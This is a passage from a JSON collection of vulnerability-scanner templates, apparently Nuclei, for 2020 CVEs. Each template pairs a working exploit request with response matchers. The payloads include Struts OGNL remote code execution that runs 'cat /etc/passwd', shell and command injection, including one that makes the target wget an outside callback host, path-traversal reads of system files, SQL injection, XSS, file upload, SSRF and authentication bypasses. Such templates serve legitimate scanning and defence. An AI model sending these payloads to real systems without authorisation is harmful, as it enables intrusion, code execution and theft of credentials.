Bypass","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/api/config"],"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["compare_versions(version, '< 8.1.0')"]},{"type":"word","part":"body","words":["\"alarm_model\"","\"actions\"","\"severity\""],"condition":"and"},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"version","group":1,"regex":["\"name\": \"Alerta ([0-9.]+)\""],"internal":true},{"type":"regex","group":1,"regex":["\"name\": \"Alerta ([0-9.]+)\""]}]}]},{"id":"CVE-2020-2096","info":{"name":"Jenkins Gitlab Hook <=1.4.2 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/gitlab/build_now%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-17530","info":{"name":"Apache Struts 2.0.0-2.5.25 - Remote Code Execution","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/?id=%25%7B%28%23instancemanager%3D%23application%5B%22org.apache.tomcat.InstanceManager%22%5D%29.%28%23stack%3D%23attr%5B%22com.opensymphony.xwork2.util.ValueStack.ValueStack%22%5D%29.%28%23bean%3D%23instancemanager.newInstance%28%22org.apache.commons.collections.BeanMap%22%29%29.%28%23bean.setBean%28%23stack%29%29.%28%23context%3D%23bean.get%28%22context%22%29%29.%28%23bean.setBean%28%23context%29%29.%28%23macc%3D%23bean.get%28%22memberAccess%22%29%29.%28%23bean.setBean%28%23macc%29%29.%28%23emptyset%3D%23instancemanager.newInstance%28%22java.util.HashSet%22%29%29.%28%23bean.put%28%22excludedClasses%22%2C%23emptyset%29%29.%28%23bean.put%28%22excludedPackageNames%22%2C%23emptyset%29%29.%28%23arglist%3D%23instancemanager.newInstance%28%22java.util.ArrayList%22%29%29.%28%23arglist.add%28%22cat+%2Fetc%2Fpasswd%22%29%29.%28%23execute%3D%23instancemanager.newInstance%28%22freemarker.template.utility.Execute%22%29%29.%28%23execute.exec%28%23arglist%29%29%7D"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]}]}]},{"id":"CVE-2020-21224","info":{"name":"Inspur ClusterEngine 4.0 - Remote Code Execution","severity":"critical"},"requests":[{"method":"POST","path":["{{BaseURL}}/login"],"body":"op=login&username=;`cat /etc/passwd`&password=\n","headers":{"Content-Type":"application/x-www-form-urlencoded","Referer":"{{Hostname}}/module/login/login.html"},"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-8115","info":{"name":"Revive Adserver <=5.0.3 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/www/delivery/afr.php?refresh=10000&\")',10000000);alert(1337);setTimeout('alert(\""],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["(?mi)window\\.location\\.replace\\(\".*alert\\(1337\\)"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-22209","info":{"name":"74cms - ajax_common.php SQL Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/plus/ajax_common.php?act=hotword&query=aa%\u9326%27%20union%20select%201,md5({{num}}),3%23%27"],"matchers":[{"type":"word","part":"body","words":["{{md5({{num}})}}"]}]}]},{"id":"CVE-2020-10549","info":{"name":"rConfig <=3.9.4 - SQL Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/snippets.inc.php?search=True&searchField=antani'+union+select+(select+concat(0x223e3c42523e5b70726f6a6563742d646973636f766572795d)+limit+0,1),NULL,NULL,NULL+--+&searchColumn=snippetName&searchOption=contains"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["[project-discovery]"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-13121","info":{"name":"Submitty <= 20.04.01 - Open Redirect","severity":"medium"},"requests":[{"raw":["POST /authentication/check_login?old=http%253A%252F%252Fexample.com%252Fhome HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{RootURL}}\nContent-Type: application/x-www-form-urlencoded\nReferer: {{RootURL}}/authentication/login\n\nuser_id={{username}}&password={{password}}&stay_logged_in=on&login=Login\n"],"cookie-reuse":true,"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$"]}]}]},{"id":"CVE-2020-15505","info":{"name":"MobileIron Core & Connector <= v10.6 & Sentry <= v9.8 - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /mifs/.;/services/LogService HTTP/1.1\nHost: {{Hostname}}\nReferer: https://{{Hostname}}\nContent-Type: x-application/hessian\nConnection: close\n\n{{hex_decode('630200480004')}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["application/x-hessian"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-17453","info":{"name":"WSO2 Carbon Management Console <=5.10 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/carbon/admin/login.jsp?msgId=%27%3Balert(%27document.domain%27)%2F%2F"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["'';alert('document.domain')//';"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-29597","info":{"name":"IncomCMS 2.0 - Arbitrary File Upload","severity":"critical"},"requests":[{"raw":["POST /incom/modules/uploader/showcase/script.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryBEJZt0IK73M2mAbt\n\n------WebKitFormBoundaryBEJZt0IK73M2mAbt\nContent-Disposition: form-data; name=\"Filedata\"; filename=\"{{randstr_1}}.png\"\nContent-Type: text/html\n\n{{randstr_2}}\n------WebKitFormBoundaryBEJZt0IK73M2mAbt--\n","GET /upload/userfiles/image/{{randstr_1}}.png HTTP/1.1\nHost: {{Hostname}}\n"],"req-condition":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body_1","words":["{\"status\":\"1\",\"name\":\"{{randstr_1}}.png\"}"]},{"type":"word","part":"body_2","words":["{{randstr_2}}"]}]}]},{"id":"CVE-2020-26258","info":{"name":"XStream <1.4.15 - Server-Side Request Forgery","severity":"high"},"requests":[{"raw":["POST / HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/xml\n\n<map>\n  <entry>\n    <jdk.nashorn.internal.objects.NativeString>\n      <flags>0</flags>\n      <value class='com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data'>\n        <dataHandler>\n          <dataSource class='javax.activation.URLDataSource'>\n            <url>http://{{interactsh-url}}/internal/:</url>\n          </dataSource>\n          <transferFlavors/>\n        </dataHandler>\n        <dataLen>0</dataLen>\n      </value>\n    </jdk.nashorn.internal.objects.NativeString>\n    <string>test</string>\n  </entry>\n</map>\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"interactsh_request","words":["User-Agent: Java"]}]}]},{"id":"CVE-2020-36365","info":{"name":"Smartstore <4.1.0 - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/backend/admin/common/clearcache?previousUrl=http://www.interact.sh"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$"]}]}]},{"id":"CVE-2020-27986","info":{"name":"SonarQube - Authentication Bypass","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/api/settings/values"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["email.smtp_host.secured","email.smtp_password.secured","email.smtp_port.secured","email.smtp_username.secured"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-5902","info":{"name":"F5 BIG-IP TMUI - Remote Code Execution","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd","{{BaseURL}}/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/f5-release","{{BaseURL}}/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/config/bigip.license","{{BaseURL}}/hsqldb%0a"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:","BIG-IP release ([\\d.]+)","[a-fA-F]{5}-[a-fA-F]{5}-[a-fA-F]{5}-[a-fA-F]{5}-[a-fA-F]{7}","HSQL Database Engine Servlet"],"condition":"or"},{"type":"status","status":[200]}]},{"raw":["POST /tmui/locallb/workspace/tmshCmd.jsp HTTP/1.1\nHost: {{Hostname}}\n\ncommand=create%20cli%20alias%20private%20list%20command%20bash\n","POST /tmui/locallb/workspace/fileSave.jsp HTTP/1.1\nHost: {{Hostname}}\n\nfileName=%2Ftmp%2Fnonexistent&content=echo%20%27aDNsbDBfdzBSbGQK%27%20%7C%20base64%20-d\n","POST /tmui/locallb/workspace/tmshCmd.jsp HTTP/1.1\nHost: {{Hostname}}\n\ncommand=list%20%2Ftmp%2Fnonexistent\n","POST /tmui/locallb/workspace/tmshCmd.jsp HTTP/1.1\nHost: {{Hostname}}\n\ncommand=delete%20cli%20alias%20private%20list\n"],"matchers-condition":"and","matchers":[{"type":"word","words":["h3ll0_w0Rld"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-9376","info":{"name":"D-Link DIR-610 Devices - Information Disclosure","severity":"high"},"requests":[{"method":"POST","path":["{{BaseURL}}/getcfg.php"],"body":"SERVICES=DEVICE.ACCOUNT%0aAUTHORIZED_GROUP=1","headers":{"Content-Type":"application/x-www-form-urlencoded"},"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<name>Admin</name>","</usrid>","</password>"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-8193","info":{"name":"Citrix  - Local File Inclusion","severity":"medium"},"requests":[{"raw":["POST /pcidss/report?type=allprofiles&sid=loginchallengeresponse1requestbody&username=nsroot&set=1 HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/xml\nX-NITRO-USER: xpyZxwy6\nX-NITRO-PASS: xWXHUJ56\n\n<appfwprofile><login></login></appfwprofile>\n","GET /menu/ss?sid=nsroot&username=nsroot&force_setup=1 HTTP/1.1\nHost: {{Hostname}}\n","GET /menu/neo HTTP/1.1\nHost: {{Hostname}}\n","GET /menu/stc HTTP/1.1\nHost: {{Hostname}}\n","POST /pcidss/report?type=allprofiles&sid=loginchallengeresponse1requestbody&username=nsroot&set=1 HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/xml\nX-NITRO-USER: oY39DXzQ\nX-NITRO-PASS: ZuU9Y9c1\nrand_key: {{randkey}}\n\n<appfwprofile><login></login></appfwprofile>\n","POST /rapi/filedownload?filter=path:%2Fetc%2Fpasswd HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/xml\nX-NITRO-USER: oY39DXzQ\nX-NITRO-PASS: ZuU9Y9c1\nrand_key: {{randkey}}\n\n<clipermission></clipermission>\n"],"cookie-reuse":true,"matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]}],"extractors":[{"type":"regex","name":"randkey","regex":["(?m)[0-9]{3,10}\\.[0-9]+"],"internal":true,"part":"body"}]}]},{"id":"CVE-2020-20988","info":{"name":"DomainMOD 4.13.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST / HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nnew_username={{username}}&new_password={{password}}\n","POST /reporting/domains/cost-by-owner.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\ndaterange=%22%2F%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E\n"],"cookie-reuse":true,"req-condition":true,"host-redirects":true,"max-redirects":2,"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(header_2, \"text/html\")","contains(body_2, \"value=\\\"\\\"/><script>alert(document.domain)</script>\")","contains(body_2, \"DomainMOD\")"],"condition":"and"}]}]},{"id":"CVE-2020-27467","info":{"name":"Processwire CMS <2.7.1 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?download=/etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-13158","info":{"name":"Artica Proxy Community Edition <4.30.000000 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/fw.progrss.details.php?popup=..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-16846","info":{"name":"SaltStack <=3002 - Shell Injection","severity":"critical"},"requests":[{"method":"POST","path":["{{BaseURL}}/run"],"body":"token=1337&client=ssh&tgt=*&fun=a&roster={{roaster}}&ssh_priv={{priv}}","headers":{"Content-Type":"application/x-www-form-urlencoded"},"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["regex(\"CherryPy\\/([0-9.]+)\", header) || regex(\"CherryPy ([0-9.]+)\", body)"]},{"type":"word","part":"body","words":["An unexpected error occurred"]},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[500]}]}]},{"id":"CVE-2020-13117","info":{"name":"Wavlink Multiple AP - Remote Command Injection","severity":"critical"},"requests":[{"raw":["POST /cgi-bin/login.cgi HTTP/1.1\nHost: {{Hostname}}\nOrigin: http://{{Hostname}}\nContent-Type: application/x-www-form-urlencoded\nAccept-Encoding: gzip, deflate\n\nnewUI=1&page=login&username=admin&langChange=0&ipaddr=192.168.1.66&login_page=login.shtml&homepage=main.shtml&sysinitpage=sysinit.shtml&hostname=wifi.wavlink.com&key=%27%3B%60wget+http%3A%2F%2F{{interactsh-url}}%3B%60%3B%23&password=asd&lang_select=en\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"body","words":["parent.location.replace"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-24223","info":{"name":"Mara CMS  7.5 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/contact.php?theme=tes%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-35749","info":{"name":"WordPress Simple Job Board <2.9.4 - Local File Inclusion","severity":"high"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{RootURL}}\nContent-Type: application/x-www-form-urlencoded\nCookie: wordpress_test_cookie=WP%20Cookie%20check\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1\n","GET /wp-admin/post.php?post=372&action=edit&sjb_file=../../../../etc/passwd HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-17518","info":{"name":"Apache Flink 1.5.1 - Local File Inclusion","severity":"high"},"requests":[{"raw":["POST /jars/upload HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryoZ8meKnrrso89R6Y\n\n------WebKitFormBoundaryoZ8meKnrrso89R6Y\nContent-Disposition: form-data; name=\"jarfile\"; filename=\"../../../../../../../tmp/poc\"\n\n{{randstr}}\n------WebKitFormBoundaryoZ8meKnrrso89R6Y--\n","GET /jobmanager/logs/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252ftmp%252fpoc HTTP/1.1\n"],"matchers":[{"type":"dsl","dsl":["contains(body_2, \"{{randstr}}\") && status_code == 200"]}]}]},{"id":"CVE-2020-8654","info":{"name":"EyesOfNetwork 5.1-5.3 - SQL Injection/Remote Code Execution","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/css/eonweb.css"],"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["compare_versions(version, '< 5.4', '>= 5.1')"]},{"type":"word","part":"body","words":["EyesOfNetwork"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"version","group":1,"regex":["# VERSION : ([0-9.]+)"],"internal":true,"part":"body"}]}]},{"id":"CVE-2020-12800","info":{"name":"WordPress Contact Form 7 <1.3.3.3 - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=---------------------------350278735926454076983690555601\nX-Requested-With: XMLHttpRequest\n\n-----------------------------350278735926454076983690555601\nContent-Disposition: form-data; name=\"supported_type\"\n\ntxt%\n-----------------------------350278735926454076983690555601\nContent-Disposition: form-data; name=\"size_limit\"\n\n5242880\n-----------------------------350278735926454076983690555601\nContent-Disposition: form-data; name=\"action\"\n\ndnd_codedropz_upload\n-----------------------------350278735926454076983690555601\nContent-Disposition: form-data; name=\"type\"\n\nclick\n-----------------------------350278735926454076983690555601\nContent-Disposition: form-data; name=\"upload-file\"; filename=\"{{randstr}}.txt%\"\nContent-Type: application/x-httpd-php\n\nCVE-2020-12800-{{randstr}}\n-----------------------------350278735926454076983690555601--\n","GET /wp-content/uploads/wp_dndcf7_uploads/wpcf7-files/{{randstr}}.txt HTTP/1.1\nHost: {{Hostname}}\n"],"req-condition":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body_2","words":["CVE-2020-12800-{{randstr}}"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-2551","info":{"name":"Oracle WebLogic Server - Remote Code Execution","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/console/login/LoginForm.jsp"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["10.3.6.0","12.1.3.0","12.2.1.3","12.2.1.4"],"condition":"or"},{"type":"word","part":"body","words":["WebLogic"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-17519","info":{"name":"Apache Flink - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/jobmanager/logs/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc%252fpasswd"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-15129","info":{"name":"Traefik - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}"],"headers":{"X-Forwarded-Prefix":"https://foo.nl"},"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<a href=\"https://foo.nl/dashboard/\">Found</a>"]},{"type":"status","status":[302]}]}]},{"id":"CVE-2020-5410","info":{"name":"Spring Cloud Config Server - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252Fetc%252Fpasswd%23foo/development"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-17362","info":{"name":"Nova Lite < 1.3.9 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/?s=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"body","words":["nova-lite"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-29395","info":{"name":"Wordpress EventON Calendar 3.0.5 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/addons/?q=%3Csvg%2Fonload%3Dalert(1)%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<svg/onload=alert(1)>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-35985","info":{"name":"Rukovoditel <= 2.7.2 - Cross Site Scripting","severity":"medium"},"requests":[{"raw":["GET /index.php?module=users/login HTTP/1.1\nHost: {{Hostname}}\n","POST /index.php?module=users/login&action=login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nform_session_token={{nonce}}&username={{username}}&password={{password}}\n","POST /index.php?module=global_lists/lists&action=save HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nform_session_token={{nonce}}&name=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&sort_order=0&notes=test\n"],"cookie-reuse":true,"redirects":true,"matchers":[{"type":"dsl","dsl":["status_code_3 == 200","contains(content_type_3, \"text/html\")","contains(body_3, \"<script>alert(document.domain)</script>\")","contains(body_3, \"rukovoditel\")"],"condition":"and"}],"extractors":[{"type":"regex","name":"nonce","group":1,"regex":["id=\"form_session_token\" value=\"(.*)\" type=\"hidden\""],"internal":true}]}]},{"id":"CVE-2020-13379","info":{"name":"Grafana 3.0.1-7.0.1 - Server-Side Request Forgery","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/avatar/1%3fd%3dhttp%3A%252F%252Fimgur.com%252F..%25252F1.1.1.1","{{BaseURL}}/grafana/avatar/1%3fd%3dhttp%3A%252F%252Fimgur.com%252F..%25252F1.1.1.1"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["cloudflare.com","dns"],"condition":"and"},{"type":"word","part":"header","words":["image/jpeg"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-5847","info":{"name":"UnRaid <=6.80 - Remote Code Execution","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/webGui/images/green-on.png/?path=x&site[x][text]=%3C?php%20echo%20md5(%22CVE-2020-5847%22);%20?%3E"],"matchers-condition":"and","matchers":[{"type":"word","words":["b13928fbcfff659363d7c7d1ec008d56"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-18268","info":{"name":"Z-Blog <=1.5.2 - Open Redirect","severity":"medium"},"requests":[{"raw":["POST /zb_system/cmd.php?act=verify HTTP/1.1\nHost: {{Hostname}}\nContent-Length: 81\nContent-Type: application/x-www-form-urlencoded\nConnection: close\n\nbtnPost=Log+In&username={{username}}&password={{md5(\"{{password}}\")}}&savedate=0\n","GET /zb_system/cmd.php?atc=login&redirect=http://www.interact.sh HTTP/2\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$"]}]}]},{"id":"CVE-2020-7136","info":{"name":"HPE Smart Update Manager < 8.5.6 - Remote Unauthorized Access","severity":"critical"},"requests":[{"raw":["POST /session/create HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nContent-Type: application/json\n\n{\"hapi\":{\"username\":\"Administrator\",\"password\":\"any_password\",\"language\":\"en\",\"mode\":\"gui\", \"usesshkey\":true, \"privatekey\":\"any_privateky\", \"passphrase\":\"any_passphase\",\"settings\":{\"output_filter\":\"passed\",\"port_number\":\"444\"}}}\n","GET /session/{{sessionid}}/node/index HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","part":"body","words":["hmessage","Command completed successfully.","node_name"],"condition":"and"}],"extractors":[{"type":"regex","name":"sessionid","group":1,"regex":["\"sessionId\":\"([a-z0-9.]+)\""],"internal":true,"part":"body"}]}]},{"id":"CVE-2020-27982","info":{"name":"IceWarp WebMail 11.4.5.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/webmail/?language=%22%3E%3Cimg%20src%3Dx%20onerror%3Dalert(1)%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<img src=x onerror=alert(1)>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-6308","info":{"name":"SAP BusinessObjects Business Intelligence Platform - Blind Server-Side Request Forgery","severity":"medium"},"requests":[{"raw":["POST /AdminTools/querybuilder/logon?framework= HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\naps={{interactsh-url}}&usr=anything&pwd=anything&aut=secEnterprise&main_page=ie.jsp&new_pass_page=newpwdform.jsp&exit_page=logonform.jsp\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["dns"]},{"type":"word","part":"location","words":["{{BaseURL}}/AdminTools/querybuilder/logonform.jsp"]}]}]},{"id":"CVE-2020-5412","info":{"name":"Spring Cloud Netflix - Server-Side Request Forgery","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/proxy.stream?origin=http://{{interactsh-url}}"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"header","words":["Jelly"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-11110","info":{"name":"Grafana <= 6.7.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /api/snapshots HTTP/1.1\nHost: {{Hostname}}\nAccept: application/json, text/plain, */*\nAccept-Language: en-US,en;q=0.5\nReferer: {{BaseURL}}\ncontent-type: application/json\nConnection: close\n\n{\"dashboard\":{\"annotations\":{\"list\":[{\"name\":\"Annotations & Alerts\",\"enable\":true,\"iconColor\":\"rgba(0, 211, 255, 1)\",\"type\":\"dashboard\",\"builtIn\":1,\"hide\":true}]},\"editable\":true,\"gnetId\":null,\"graphTooltip\":0,\"id\":null,\"links\":[],\"panels\":[],\"schemaVersion\":18,\"snapshot\":{\"originalUrl\":\"javascript:alert('Revers3c')\",\"timestamp\":\"2020-03-30T01:24:44.529Z\"},\"style\":\"dark\",\"tags\":[],\"templating\":{\"list\":[]},\"time\":{\"from\":null,\"to\":\"2020-03-30T01:24:53.549Z\",\"raw\":{\"from\":\"6h\",\"to\":\"now\"}},\"timepicker\":{\"refresh_intervals\":[\"5s\",\"10s\",\"30s\",\"1m\",\"5m\",\"15m\",\"30m\",\"1h\",\"2h\",\"1d\"],\"time_options\":[\"5m\",\"15m\",\"1h\",\"6h\",\"12h\",\"24h\",\"2d\",\"7d\",\"30d\"]},\"timezone\":\"\",\"title\":\"Dashboard\",\"uid\":null,\"version\":0},\"name\":\"Dashboard\",\"expires\":0}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["application/json"]},{"type":"word","part":"body","words":["\"deleteKey\":","\"deleteUrl\":"],"condition":"and"},{"type":"status","status":[200]}],"extractors":[{"type":"regex","group":1,"regex":["\"url\":\"([a-z:/0-9A-Z]+)\""],"part":"body"}]}]},{"id":"CVE-2020-6637","info":{"name":"OpenSIS 7.3 - SQL Injection","severity":"critical"},"requests":[{"method":"POST","path":["{{BaseURL}}/account/index.php","{{BaseURL}}/opensis/index.php","{{BaseURL}}/index.php"],"body":"USERNAME=%27%29or%601%60%3D%601%60%3B--+-&PASSWORD=A&language=en&log=\n","headers":{"Content-Type":"application/x-www-form-urlencoded"},"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["SQL STATEMENT:","<TD>UPDATE login_authentication SET FAILED_LOGIN=FAILED_LOGIN+1 WHERE UPPER(USERNAME)=UPPER(NULL)or`1`=`1`;-- -')</TD>"],"condition":"and"},{"type":"word","part":"header","words":["text/html"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-25078","info":{"name":"D-Link DCS-2530L/DCS-2670L  - Administrator Password Disclosure","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/config/getuser?index=0"],"matchers-condition":"and","matchers":[{"type":"word","words":["name=","pass="],"condition":"and"},{"type":"word","part":"header","words":["text/plain"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-26948","info":{"name":"Emby Server Server-Side Request Forgery","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/Items/RemoteSearch/Image?ProviderName=TheMovieDB&ImageURL=http://notburpcollaborator.net"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Name or service not known"]},{"type":"word","part":"header","words":["text/plain"]},{"type":"status","status":[500]}]}]},{"id":"CVE-2020-11930","info":{"name":"WordPress GTranslate <2.8.52 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/does_not_exist\"%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E<img%20src=x"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain)</script>","uri-translation"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-19515","info":{"name":"qdPM 9.1 - Cross-site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/install/index.php?step=database_config&db_error=<img%20src=x%20onerror=alert(document.domain)%20/>"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<img src=x onerror=alert(document.domain) 